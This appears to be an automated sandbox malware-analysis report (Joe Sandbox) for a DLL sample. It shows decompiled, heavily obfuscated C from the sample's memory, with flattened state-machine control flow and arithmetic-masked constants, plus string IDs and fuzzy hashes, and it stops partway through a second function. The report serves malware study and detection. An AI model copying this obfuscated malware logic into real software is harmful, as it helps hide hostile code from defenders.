                                                                                                                                                                                      				_v1704 = _v1704 << 0xf;
                                                                                                                                                                                      				_v1704 = _v1704 ^ 0x4cb93698;
                                                                                                                                                                                      				_v1592 = 0x60e14f;
                                                                                                                                                                                      				_v1592 = _v1592 + 0xffffa0eb;
                                                                                                                                                                                      				_v1592 = _v1592 ^ 0x006da1fe;
                                                                                                                                                                                      				_v1660 = 0xb84cd6;
                                                                                                                                                                                      				_v1660 = _v1660 << 0xe;
                                                                                                                                                                                      				_v1660 = _v1660 | 0xae469af4;
                                                                                                                                                                                      				_v1660 = _v1660 ^ 0xbf747a00;
                                                                                                                                                                                      				_v1628 = 0x2ae679;
                                                                                                                                                                                      				_v1628 = _v1628 + 0xffffe76d;
                                                                                                                                                                                      				_v1628 = _v1628 + 0xffff966a;
                                                                                                                                                                                      				_v1628 = _v1628 ^ 0x002af9b0;
                                                                                                                                                                                      				_v1600 = 0x5dc215;
                                                                                                                                                                                      				_v1600 = _v1600 + 0xffff301b;
                                                                                                                                                                                      				_v1600 = _v1600 ^ 0x00549305;
                                                                                                                                                                                      				_v1652 = 0xe3917b;
                                                                                                                                                                                      				_v1652 = _v1652 << 0xd;
                                                                                                                                                                                      				_v1652 = _v1652 ^ 0xb15aed13;
                                                                                                                                                                                      				_v1652 = _v1652 ^ 0xc37cfd68;
                                                                                                                                                                                      				_v1636 = 0xa59055;
                                                                                                                                                                                      				_v1636 = _v1636 + 0xffffdd12;
                                                                                                                                                                                      				_v1636 = _v1636 ^ 0x00a1f596;
                                                                                                                                                                                      				_v1724 = 0xf0f3b7;
                                                                                                                                                                                      				_v1724 = _v1724 << 0xb;
                                                                                                                                                                                      				_t516 = 0x55;
                                                                                                                                                                                      				_v1724 = _v1724 / _t516;
                                                                                                                                                                                      				_v1724 = _v1724 ^ 0x0c3c14bd;
                                                                                                                                                                                      				_v1724 = _v1724 ^ 0x0da6b3ec;
                                                                                                                                                                                      				_v1604 = 0x70e6ad;
                                                                                                                                                                                      				_t517 = 0x33;
                                                                                                                                                                                      				_t498 = _v1576;
                                                                                                                                                                                      				_v1604 = _v1604 / _t517;
                                                                                                                                                                                      				_v1604 = _v1604 ^ 0x0001b026;
                                                                                                                                                                                      				_v1680 = 0x336eab;
                                                                                                                                                                                      				_v1680 = _v1680 + 0x2490;
                                                                                                                                                                                      				_v1680 = _v1680 + 0xffffdec5;
                                                                                                                                                                                      				_v1680 = _v1680 | 0xc166c96f;
                                                                                                                                                                                      				_v1680 = _v1680 ^ 0xc1736b65;
                                                                                                                                                                                      				_v1688 = 0x11f1a3;
                                                                                                                                                                                      				_v1688 = _v1688 * 0x68;
                                                                                                                                                                                      				_v1688 = _v1688 + 0xffffb309;
                                                                                                                                                                                      				_v1688 = _v1688 + 0xed48;
                                                                                                                                                                                      				_v1688 = _v1688 ^ 0x074f9ff6;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					_t518 = 0x5c;
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						L2:
                                                                                                                                                                                      						_t475 = 0x8f5cf45;
                                                                                                                                                                                      						do {
                                                                                                                                                                                      							L3:
                                                                                                                                                                                      							if(_t578 == 0xb6e718) {
                                                                                                                                                                                      								_t476 = E003F0AD3(_v1648, _v1728, __eflags);
                                                                                                                                                                                      								_t520 = 0x3d149c;
                                                                                                                                                                                      								__eflags = E003D2089(_v1672, _v1624, _t520, _v1632, _v1712, _v1720, _t520,  &_v1572, _t520, _t520, _v1596, _v1640, _v1588, _t476);
                                                                                                                                                                                      								_t578 =  ==  ? 0x8f5cf45 : 0xf961a4b;
                                                                                                                                                                                      								E003E2EED(_v1696, _v1608, _v1704, _t476);
                                                                                                                                                                                      								_t583 =  &(_t583[0xf]);
                                                                                                                                                                                      								_t475 = 0x8f5cf45;
                                                                                                                                                                                      								_t518 = 0x5c;
                                                                                                                                                                                      								goto L17;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								if(_t578 == 0x2411a89) {
                                                                                                                                                                                      									E003F2A25(_v1604, _v1680, _v1572, _v1688);
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									if(_t578 == 0x2d3ef18) {
                                                                                                                                                                                      										_push(0x3d144c);
                                                                                                                                                                                      										_t483 = E003F0AD3(_v1580, _v1584, __eflags);
                                                                                                                                                                                      										E003F2C16( &_v520, __eflags);
                                                                                                                                                                                      										E003EB062( &_v1560, __eflags,  *0x3f5bd8 + 0x238, _v1668, _v1676, _t483, _v1620, 0x104, _v1684,  *0x3f5bd8 + 0x30,  &_v520,  &_v1040, _v1716);
                                                                                                                                                                                      										E003E2EED(_v1736, _v1740, _v1656, _t483);
                                                                                                                                                                                      										_t583 =  &(_t583[0xe]);
                                                                                                                                                                                      										_t578 = 0x4a5ec26;
                                                                                                                                                                                      										goto L1;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										if(_t578 == 0x4a5ec26) {
                                                                                                                                                                                      											_t500 =  *0x3f5bd8 + 0x30;
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												__eflags =  *_t500 - _t518;
                                                                                                                                                                                      												if(__eflags == 0) {
                                                                                                                                                                                      													break;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t500 = _t500 + 2;
                                                                                                                                                                                      												__eflags = _t500;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t498 = _t500 + 2;
                                                                                                                                                                                      											_t578 = 0xb6e718;
                                                                                                                                                                                      											goto L2;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											if(_t578 == _t475) {
                                                                                                                                                                                      												_t495 = E003E39E4(_v1600, _v1652, _v1572, _v1636, 2 + E003DF14F(_v1592,  &_v1560, _v1660, _v1628) * 2,  &_v1560, _v1700, _v1724, _t498);
                                                                                                                                                                                      												_t583 =  &(_t583[0xa]);
                                                                                                                                                                                      												__eflags = _t495;
                                                                                                                                                                                      												_t578 = 0x2411a89;
                                                                                                                                                                                      												_v1576 = 0 | __eflags == 0x00000000;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													L1:
                                                                                                                                                                                      													_t518 = 0x5c;
                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												if(_t578 != 0xb4e665b) {
                                                                                                                                                                                      													goto L17;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_push(_t518);
                                                                                                                                                                                      													E003DE259(_v1612, _v1616, _v1692, _v1732, _t518, _t518,  &_v1040, _v1708, _v1644);
                                                                                                                                                                                      													_t583 =  &(_t583[8]);
                                                                                                                                                                                      													_t578 = 0x2d3ef18;
                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                      														L1:
                                                                                                                                                                                      														_t518 = 0x5c;
                                                                                                                                                                                      														L2:
                                                                                                                                                                                      														_t475 = 0x8f5cf45;
                                                                                                                                                                                      														goto L3;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L20:
                                                                                                                                                                                      							return _v1576;
                                                                                                                                                                                      							L17:
                                                                                                                                                                                      							__eflags = _t578 - 0xf961a4b;
                                                                                                                                                                                      						} while (__eflags != 0);
                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}














































































                                                                                                                                                                                      0x003d3e3b
                                                                                                                                                                                      0x003d3e41
                                                                                                                                                                                      0x003d3e4e
                                                                                                                                                                                      0x003d3e57
                                                                                                                                                                                      0x003d3e63
                                                                                                                                                                                      0x003d3e6a
                                                                                                                                                                                      0x003d3e78
                                                                                                                                                                                      0x003d3e7d
                                                                                                                                                                                      0x003d3e86
                                                                                                                                                                                      0x003d3e91
                                                                                                                                                                                      0x003d3e9c
                                                                                                                                                                                      0x003d3ea4
                                                                                                                                                                                      0x003d3ea9
                                                                                                                                                                                      0x003d3eb1
                                                                                                                                                                                      0x003d3eb9
                                                                                                                                                                                      0x003d3ec5
                                                                                                                                                                                      0x003d3eca
                                                                                                                                                                                      0x003d3ed0
                                                                                                                                                                                      0x003d3ed8
                                                                                                                                                                                      0x003d3ee0
                                                                                                                                                                                      0x003d3ee8
                                                                                                                                                                                      0x003d3ef0
                                                                                                                                                                                      0x003d3ef8
                                                                                                                                                                                      0x003d3f00
                                                                                                                                                                                      0x003d3f08
                                                                                                                                                                                      0x003d3f13
                                                                                                                                                                                      0x003d3f1b
                                                                                                                                                                                      0x003d3f26
                                                                                                                                                                                      0x003d3f33
                                                                                                                                                                                      0x003d3f36
                                                                                                                                                                                      0x003d3f3a
                                                                                                                                                                                      0x003d3f42
                                                                                                                                                                                      0x003d3f4a
                                                                                                                                                                                      0x003d3f52
                                                                                                                                                                                      0x003d3f62
                                                                                                                                                                                      0x003d3f66
                                                                                                                                                                                      0x003d3f6e
                                                                                                                                                                                      0x003d3f73
                                                                                                                                                                                      0x003d3f7b
                                                                                                                                                                                      0x003d3f83
                                                                                                                                                                                      0x003d3f8f
                                                                                                                                                                                      0x003d3f94
                                                                                                                                                                                      0x003d3f9a
                                                                                                                                                                                      0x003d3fa2
                                                                                                                                                                                      0x003d3faa
                                                                                                                                                                                      0x003d3fb2
                                                                                                                                                                                      0x003d3fbe
                                                                                                                                                                                      0x003d3fc1
                                                                                                                                                                                      0x003d3fc5
                                                                                                                                                                                      0x003d3fcd
                                                                                                                                                                                      0x003d3fd8
                                                                                                                                                                                      0x003d3fe3
                                                                                                                                                                                      0x003d3fee
                                                                                                                                                                                      0x003d3ff9
                                                                                                                                                                                      0x003d4004
                                                                                                                                                                                      0x003d400f
                                                                                                                                                                                      0x003d4020
                                                                                                                                                                                      0x003d4023
                                                                                                                                                                                      0x003d4027
                                                                                                                                                                                      0x003d402c
                                                                                                                                                                                      0x003d4034
                                                                                                                                                                                      0x003d403c
                                                                                                                                                                                      0x003d4046
                                                                                                                                                                                      0x003d404a
                                                                                                                                                                                      0x003d4052
                                                                                                                                                                                      0x003d405a
                                                                                                                                                                                      0x003d4062
                                                                                                                                                                                      0x003d406a
                                                                                                                                                                                      0x003d4072
                                                                                                                                                                                      0x003d407d
                                                                                                                                                                                      0x003d4093
                                                                                                                                                                                      0x003d409a
                                                                                                                                                                                      0x003d40a5
                                                                                                                                                                                      0x003d40b1
                                                                                                                                                                                      0x003d40b6
                                                                                                                                                                                      0x003d40c0
                                                                                                                                                                                      0x003d40c5
                                                                                                                                                                                      0x003d40cb
                                                                                                                                                                                      0x003d40cf
                                                                                                                                                                                      0x003d40d7
                                                                                                                                                                                      0x003d40df
                                                                                                                                                                                      0x003d40e4
                                                                                                                                                                                      0x003d40ec
                                                                                                                                                                                      0x003d40f4
                                                                                                                                                                                      0x003d40fc
                                                                                                                                                                                      0x003d4104
                                                                                                                                                                                      0x003d410c
                                                                                                                                                                                      0x003d4114
                                                                                                                                                                                      0x003d411c
                                                                                                                                                                                      0x003d4124
                                                                                                                                                                                      0x003d4130
                                                                                                                                                                                      0x003d4135
                                                                                                                                                                                      0x003d413f
                                                                                                                                                                                      0x003d4144
                                                                                                                                                                                      0x003d414a
                                                                                                                                                                                      0x003d4152
                                                                                                                                                                                      0x003d415a
                                                                                                                                                                                      0x003d4162
                                                                                                                                                                                      0x003d416a
                                                                                                                                                                                      0x003d416f
                                                                                                                                                                                      0x003d4177
                                                                                                                                                                                      0x003d417f
                                                                                                                                                                                      0x003d4187
                                                                                                                                                                                      0x003d418c
                                                                                                                                                                                      0x003d4194
                                                                                                                                                                                      0x003d41a1
                                                                                                                                                                                      0x003d41a2
                                                                                                                                                                                      0x003d41ac
                                                                                                                                                                                      0x003d41b0
                                                                                                                                                                                      0x003d41b5
                                                                                                                                                                                      0x003d41bd
                                                                                                                                                                                      0x003d41ca
                                                                                                                                                                                      0x003d41d5
                                                                                                                                                                                      0x003d41dd
                                                                                                                                                                                      0x003d41e8
                                                                                                                                                                                      0x003d41f6
                                                                                                                                                                                      0x003d41fb
                                                                                                                                                                                      0x003d4204
                                                                                                                                                                                      0x003d420f
                                                                                                                                                                                      0x003d421a
                                                                                                                                                                                      0x003d4222
                                                                                                                                                                                      0x003d422a
                                                                                                                                                                                      0x003d4237
                                                                                                                                                                                      0x003d423a
                                                                                                                                                                                      0x003d423e
                                                                                                                                                                                      0x003d4246
                                                                                                                                                                                      0x003d424e
                                                                                                                                                                                      0x003d425b
                                                                                                                                                                                      0x003d4267
                                                                                                                                                                                      0x003d426b
                                                                                                                                                                                      0x003d4273
                                                                                                                                                                                      0x003d427e
                                                                                                                                                                                      0x003d4289
                                                                                                                                                                                      0x003d4294
                                                                                                                                                                                      0x003d42a7
                                                                                                                                                                                      0x003d42aa
                                                                                                                                                                                      0x003d42b1
                                                                                                                                                                                      0x003d42bc
                                                                                                                                                                                      0x003d42c4
                                                                                                                                                                                      0x003d42cc
                                                                                                                                                                                      0x003d42d9
                                                                                                                                                                                      0x003d42dd
                                                                                                                                                                                      0x003d42e5
                                                                                                                                                                                      0x003d42f7
                                                                                                                                                                                      0x003d42fa
                                                                                                                                                                                      0x003d4301
                                                                                                                                                                                      0x003d430c
                                                                                                                                                                                      0x003d4314
                                                                                                                                                                                      0x003d4318
                                                                                                                                                                                      0x003d4320
                                                                                                                                                                                      0x003d4325
                                                                                                                                                                                      0x003d432d
                                                                                                                                                                                      0x003d4338
                                                                                                                                                                                      0x003d4343
                                                                                                                                                                                      0x003d434e
                                                                                                                                                                                      0x003d4356
                                                                                                                                                                                      0x003d435b
                                                                                                                                                                                      0x003d4363
                                                                                                                                                                                      0x003d436b
                                                                                                                                                                                      0x003d4376
                                                                                                                                                                                      0x003d4381
                                                                                                                                                                                      0x003d438c
                                                                                                                                                                                      0x003d4397
                                                                                                                                                                                      0x003d43a2
                                                                                                                                                                                      0x003d43ad
                                                                                                                                                                                      0x003d43b8
                                                                                                                                                                                      0x003d43c0
                                                                                                                                                                                      0x003d43c5
                                                                                                                                                                                      0x003d43cd
                                                                                                                                                                                      0x003d43d5
                                                                                                                                                                                      0x003d43e5
                                                                                                                                                                                      0x003d43ef
                                                                                                                                                                                      0x003d43fc
                                                                                                                                                                                      0x003d4404
                                                                                                                                                                                      0x003d440f
                                                                                                                                                                                      0x003d4414
                                                                                                                                                                                      0x003d441a
                                                                                                                                                                                      0x003d4422
                                                                                                                                                                                      0x003d442a
                                                                                                                                                                                      0x003d443c
                                                                                                                                                                                      0x003d443f
                                                                                                                                                                                      0x003d4446
                                                                                                                                                                                      0x003d444d
                                                                                                                                                                                      0x003d4458
                                                                                                                                                                                      0x003d4460
                                                                                                                                                                                      0x003d4468
                                                                                                                                                                                      0x003d4470
                                                                                                                                                                                      0x003d4478
                                                                                                                                                                                      0x003d4480
                                                                                                                                                                                      0x003d448d
                                                                                                                                                                                      0x003d4491
                                                                                                                                                                                      0x003d4499
                                                                                                                                                                                      0x003d44a1
                                                                                                                                                                                      0x003d44a9
                                                                                                                                                                                      0x003d44a9
                                                                                                                                                                                      0x003d44ab
                                                                                                                                                                                      0x003d44ac
                                                                                                                                                                                      0x003d44ac
                                                                                                                                                                                      0x003d44ac
                                                                                                                                                                                      0x003d44b1
                                                                                                                                                                                      0x003d44b1
                                                                                                                                                                                      0x003d44b3
                                                                                                                                                                                      0x003d4661
                                                                                                                                                                                      0x003d4666
                                                                                                                                                                                      0x003d46aa
                                                                                                                                                                                      0x003d46c6
                                                                                                                                                                                      0x003d46c9
                                                                                                                                                                                      0x003d46ce
                                                                                                                                                                                      0x003d46d1
                                                                                                                                                                                      0x003d46d8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d44b9
                                                                                                                                                                                      0x003d44bf
                                                                                                                                                                                      0x003d46fd
                                                                                                                                                                                      0x003d44c5
                                                                                                                                                                                      0x003d44cb
                                                                                                                                                                                      0x003d45c3
                                                                                                                                                                                      0x003d45c8
                                                                                                                                                                                      0x003d45d6
                                                                                                                                                                                      0x003d462d
                                                                                                                                                                                      0x003d4642
                                                                                                                                                                                      0x003d4647
                                                                                                                                                                                      0x003d464a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d44d1
                                                                                                                                                                                      0x003d44d7
                                                                                                                                                                                      0x003d459e
                                                                                                                                                                                      0x003d45a6
                                                                                                                                                                                      0x003d45a6
                                                                                                                                                                                      0x003d45a9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d45a3
                                                                                                                                                                                      0x003d45a3
                                                                                                                                                                                      0x003d45a3
                                                                                                                                                                                      0x003d45ab
                                                                                                                                                                                      0x003d45ae
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d44dd
                                                                                                                                                                                      0x003d44df
                                                                                                                                                                                      0x003d4578
                                                                                                                                                                                      0x003d457f
                                                                                                                                                                                      0x003d4582
                                                                                                                                                                                      0x003d4584
                                                                                                                                                                                      0x003d458c
                                                                                                                                                                                      0x003d44a9
                                                                                                                                                                                      0x003d44a9
                                                                                                                                                                                      0x003d44ab
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d44ab
                                                                                                                                                                                      0x003d44e1
                                                                                                                                                                                      0x003d44e7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d44ed
                                                                                                                                                                                      0x003d44ed
                                                                                                                                                                                      0x003d4516
                                                                                                                                                                                      0x003d451b
                                                                                                                                                                                      0x003d451e
                                                                                                                                                                                      0x003d44a9
                                                                                                                                                                                      0x003d44a9
                                                                                                                                                                                      0x003d44ab
                                                                                                                                                                                      0x003d44ac
                                                                                                                                                                                      0x003d44ac
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d44ac
                                                                                                                                                                                      0x003d44a9
                                                                                                                                                                                      0x003d44e7
                                                                                                                                                                                      0x003d44df
                                                                                                                                                                                      0x003d44d7
                                                                                                                                                                                      0x003d44cb
                                                                                                                                                                                      0x003d44bf
                                                                                                                                                                                      0x003d4704
                                                                                                                                                                                      0x003d4715
                                                                                                                                                                                      0x003d46d9
                                                                                                                                                                                      0x003d46d9
                                                                                                                                                                                      0x003d46d9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d46e5
                                                                                                                                                                                      0x003d44ac

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: }$.F|$>&1Z$H$O`$^1+$d|$y*${oS\$q"
                                                                                                                                                                                      • API String ID: 0-3812043278
                                                                                                                                                                                      • Opcode ID: bc6d420d7b24ffa525b47de285d7f4d13ec4e06c08e0f3c1a9dfe7c4ddc9005e
                                                                                                                                                                                      • Instruction ID: a0e33eb541ba31f8404921c8331c4ab1f9e7b64b8ddba1f40223b013d1e105bd
                                                                                                                                                                                      • Opcode Fuzzy Hash: bc6d420d7b24ffa525b47de285d7f4d13ec4e06c08e0f3c1a9dfe7c4ddc9005e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E2223725083809FE368CF25D94AA5BBBF2FBC5714F10890EF29986260D7B59949CF03
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: " fn( -> = { }truefalse{0x$)C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$H$_$_$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
                                                                                                                                                                                      • API String ID: 0-4270729952
                                                                                                                                                                                      • Opcode ID: a97eaceffefa6359022479113146906cd852b795711f487821b6436b0ea98621
                                                                                                                                                                                      • Instruction ID: a5b6ebbd66daab3fc3fbd1c71deb9ba0aac953fc247c89a5c799606aa03dc9fb
                                                                                                                                                                                      • Opcode Fuzzy Hash: a97eaceffefa6359022479113146906cd852b795711f487821b6436b0ea98621
                                                                                                                                                                                      • Instruction Fuzzy Hash: 83622571608B628FE7548EA9D45076EB7E6AFC1314F00C92CE8998B386D7B1D85DCF42
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E9D7602, 6E9D7A59
                                                                                                                                                                                      • called `Option::unwrap()` on a `None` value, xrefs: 6E9D79BC
                                                                                                                                                                                      • bool, xrefs: 6E9D788B
                                                                                                                                                                                      • {recursion limit reached}{invalid syntax}, xrefs: 6E9D7C06
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __aulldiv__aullrem
                                                                                                                                                                                      • String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
                                                                                                                                                                                      • API String ID: 3839614884-433696047
                                                                                                                                                                                      • Opcode ID: dcf6589a831109f76284fc955bfeaeb4b2749b1ed48ee6a682a7f7b13c19a0c2
                                                                                                                                                                                      • Instruction ID: 4a48af53d434588036786a82a4353238593188208bc34d8bcb906a3afe03e63c
                                                                                                                                                                                      • Opcode Fuzzy Hash: dcf6589a831109f76284fc955bfeaeb4b2749b1ed48ee6a682a7f7b13c19a0c2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 47E11875A08B624FD304CFA8C49076AB7E5AF86314F14C96ED8958B3D1D334D84ACF52
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                      			E003ED5FE(intOrPtr* __ecx, signed int __edx) {
                                                                                                                                                                                      				char _v128;
                                                                                                                                                                                      				char _v256;
                                                                                                                                                                                      				char _v288;
                                                                                                                                                                                      				signed int _v292;
                                                                                                                                                                                      				intOrPtr _v296;
                                                                                                                                                                                      				intOrPtr _v300;
                                                                                                                                                                                      				signed int _v304;
                                                                                                                                                                                      				signed int _v308;
                                                                                                                                                                                      				unsigned int _v312;
                                                                                                                                                                                      				signed int _v316;
                                                                                                                                                                                      				signed int _v320;
                                                                                                                                                                                      				signed int _v324;
                                                                                                                                                                                      				signed int _v328;
                                                                                                                                                                                      				signed int _v332;
                                                                                                                                                                                      				signed int _v336;
                                                                                                                                                                                      				signed int _v340;
                                                                                                                                                                                      				signed int _v344;
                                                                                                                                                                                      				signed int _v348;
                                                                                                                                                                                      				signed int _v352;
                                                                                                                                                                                      				signed int _v356;
                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                      				signed int _v364;
                                                                                                                                                                                      				signed int _v368;
                                                                                                                                                                                      				signed int _v372;
                                                                                                                                                                                      				signed int _v376;
                                                                                                                                                                                      				signed int _v380;
                                                                                                                                                                                      				signed int _v384;
                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                      				signed int _v392;
                                                                                                                                                                                      				signed int _v396;
                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                      				signed int _v404;
                                                                                                                                                                                      				signed int _v408;
                                                                                                                                                                                      				signed int _v412;
                                                                                                                                                                                      				signed int _v416;
                                                                                                                                                                                      				unsigned int _v420;
                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                      				signed int _v428;
                                                                                                                                                                                      				signed int _v432;
                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                      				signed int _v440;
                                                                                                                                                                                      				signed int _v444;
                                                                                                                                                                                      				signed int _v448;
                                                                                                                                                                                      				unsigned int _v452;
                                                                                                                                                                                      				signed int _v456;
                                                                                                                                                                                      				signed int _v460;
                                                                                                                                                                                      				signed int _v464;
                                                                                                                                                                                      				signed int _v468;
                                                                                                                                                                                      				signed int _v472;
                                                                                                                                                                                      				signed int _v476;
                                                                                                                                                                                      				signed int _v480;
                                                                                                                                                                                      				signed int _v484;
                                                                                                                                                                                      				intOrPtr* _v488;
                                                                                                                                                                                      				unsigned int _v492;
                                                                                                                                                                                      				signed int _v496;
                                                                                                                                                                                      				signed int _v500;
                                                                                                                                                                                      				signed int _v504;
                                                                                                                                                                                      				signed int _v508;
                                                                                                                                                                                      				signed int _v512;
                                                                                                                                                                                      				signed int _v516;
                                                                                                                                                                                      				signed int _v520;
                                                                                                                                                                                      				signed int _v524;
                                                                                                                                                                                      				signed int _v528;
                                                                                                                                                                                      				signed int _v532;
                                                                                                                                                                                      				signed int _v536;
                                                                                                                                                                                      				signed int _v540;
                                                                                                                                                                                      				signed int _v544;
                                                                                                                                                                                      				unsigned int _v548;
                                                                                                                                                                                      				signed int _v552;
                                                                                                                                                                                      				signed int _v556;
                                                                                                                                                                                      				signed int _t638;
                                                                                                                                                                                      				void* _t643;
                                                                                                                                                                                      				void* _t645;
                                                                                                                                                                                      				signed int _t648;
                                                                                                                                                                                      				void* _t649;
                                                                                                                                                                                      				void* _t684;
                                                                                                                                                                                      				signed int _t686;
                                                                                                                                                                                      				int _t688;
                                                                                                                                                                                      				signed int _t690;
                                                                                                                                                                                      				signed int _t691;
                                                                                                                                                                                      				signed int _t695;
                                                                                                                                                                                      				intOrPtr* _t696;
                                                                                                                                                                                      				void* _t698;
                                                                                                                                                                                      				void* _t708;
                                                                                                                                                                                      				void* _t713;
                                                                                                                                                                                      				signed int _t719;
                                                                                                                                                                                      				void* _t756;
                                                                                                                                                                                      				signed int _t773;
                                                                                                                                                                                      				signed int _t774;
                                                                                                                                                                                      				signed int _t775;
                                                                                                                                                                                      				signed int _t776;
                                                                                                                                                                                      				signed int _t777;
                                                                                                                                                                                      				signed int _t778;
                                                                                                                                                                                      				signed int _t779;
                                                                                                                                                                                      				signed int _t780;
                                                                                                                                                                                      				signed int _t781;
                                                                                                                                                                                      				signed int _t782;
                                                                                                                                                                                      				signed int _t783;
                                                                                                                                                                                      				signed int _t784;
                                                                                                                                                                                      				signed int _t785;
                                                                                                                                                                                      				signed int _t786;
                                                                                                                                                                                      				signed int _t787;
                                                                                                                                                                                      				void* _t789;
                                                                                                                                                                                      				void* _t790;
                                                                                                                                                                                      				void* _t793;
                                                                                                                                                                                      				void* _t794;
                                                                                                                                                                                      				signed int _t799;
                                                                                                                                                                                      				signed int _t800;
                                                                                                                                                                                      				signed int* _t801;
                                                                                                                                                                                      				signed int* _t802;
                                                                                                                                                                                      				void* _t807;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t696 = __ecx;
                                                                                                                                                                                      				_t801 =  &_v556;
                                                                                                                                                                                      				_v292 = _v292 & 0x00000000;
                                                                                                                                                                                      				_v296 = 0x24ef18;
                                                                                                                                                                                      				_v432 = 0x6807f6;
                                                                                                                                                                                      				_v432 = _v432 + 0xc1d0;
                                                                                                                                                                                      				_v432 = _v432 | 0x4e6dc4da;
                                                                                                                                                                                      				_v432 = _v432 ^ 0x4e6dcdde;
                                                                                                                                                                                      				_v352 = 0x58a8af;
                                                                                                                                                                                      				_v352 = _v352 + 0x4945;
                                                                                                                                                                                      				_v352 = _v352 ^ 0x005e8e6e;
                                                                                                                                                                                      				_v332 = 0x47a7e9;
                                                                                                                                                                                      				_v304 = __edx;
                                                                                                                                                                                      				_t793 = 0xc3ba346;
                                                                                                                                                                                      				_v488 = __ecx;
                                                                                                                                                                                      				_t799 = 0x51;
                                                                                                                                                                                      				_v332 = _v332 / _t799;
                                                                                                                                                                                      				_v332 = _v332 ^ 0x000a6999;
                                                                                                                                                                                      				_v388 = 0xce3530;
                                                                                                                                                                                      				_v388 = _v388 + 0xffff994b;
                                                                                                                                                                                      				_v388 = _v388 + 0xfcf;
